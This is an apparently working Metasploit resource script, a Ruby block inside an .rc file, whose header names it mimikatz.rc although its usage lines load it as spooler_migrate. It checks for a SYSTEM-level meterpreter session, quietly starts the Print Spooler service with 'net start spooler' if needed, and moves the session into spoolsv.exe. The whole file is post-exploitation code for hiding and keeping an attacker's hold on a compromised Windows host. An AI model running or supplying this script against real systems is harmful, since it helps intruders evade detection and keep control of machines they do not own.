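# mimikatz.rc  (header name as given; the usage lines below load this script as spooler_migrate)
# Checks whether the Print Spooler (spoolsv.exe) is running as NT AUTHORITY\SYSTEM. If not, starts it.
# Then migrates the meterpreter session into the spooler process.
# Requires a meterpreter session that already runs as NT AUTHORITY\SYSTEM; otherwise the script stops with an error.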
# usage (e.g. from msfconsole)
# setg SESSION 1
# resource spooler_migrate
<ruby>
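# Moves a SYSTEM-level meterpreter session into the Print Spooler process
# (spoolsv.exe), starting the spooler service first when no such process is found.
# The session id is read from the global SESSION datastore option (setg SESSION <id>).
#
# NOTE(review): this runs `net start spooler` on the host and so changes service
# state there; 'Hidden' presumably only suppresses the window, the service start
# and the new process remain visible to host telemetry.
session_id = Integer(framework.datastore['SESSION'])
session = framework.sessions[session_id]

if session.nil?
  # Presumably framework.sessions[] yields nil for an id with no live session
  # (verify against the framework); without this guard the type check below
  # would fail with NoMethodError instead of a readable message.
  print_error("Error, no session with id #{session_id}")
elsif session.type == "meterpreter"
  uid = session.sys.config.getuid
  if uid != "NT AUTHORITY\\SYSTEM"
    print_error("Error, must have SYSTEM meterpreter shell")
    return
  end

  # Bound the number of service starts so a spooler that cannot start
  # (disabled service, policy) does not leave the script looping forever.
  max_start_attempts = 3
  start_attempts = 0
  spooler_proc = nil

  while spooler_proc.nil?
    # Re-read the process list on every pass. The list used to be fetched once,
    # before the loop, so a spooler started by this script was never seen and
    # the loop could not terminate.
    session.sys.process.get_processes.each do |entry|
      spooler_proc = entry['pid'] if entry['name'] == "spoolsv.exe" && entry["user"] == "NT AUTHORITY\\SYSTEM"
    end
    break if spooler_proc || start_attempts >= max_start_attempts

    start_attempts += 1
    print_status("spooler isn't running - starting")
    print_status("net start spooler")
    m_cmd = "net start spooler"
    started = session.sys.process.execute(m_cmd, nil, {'Hidden' => 'true', 'Channelized' => true})
    started.wait()
    # Give the service time to come up before looking for spoolsv.exe again.
    print_status("sleeping for 20")
    sleep 20
  end

  if spooler_proc.nil?
    print_error("Error, spooler not running after #{max_start_attempts} start attempts")
  else
    print_status("migrating to spooler")
    session.core.migrate(spooler_proc)
    print_status("done migrating")
  end
end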
</ruby>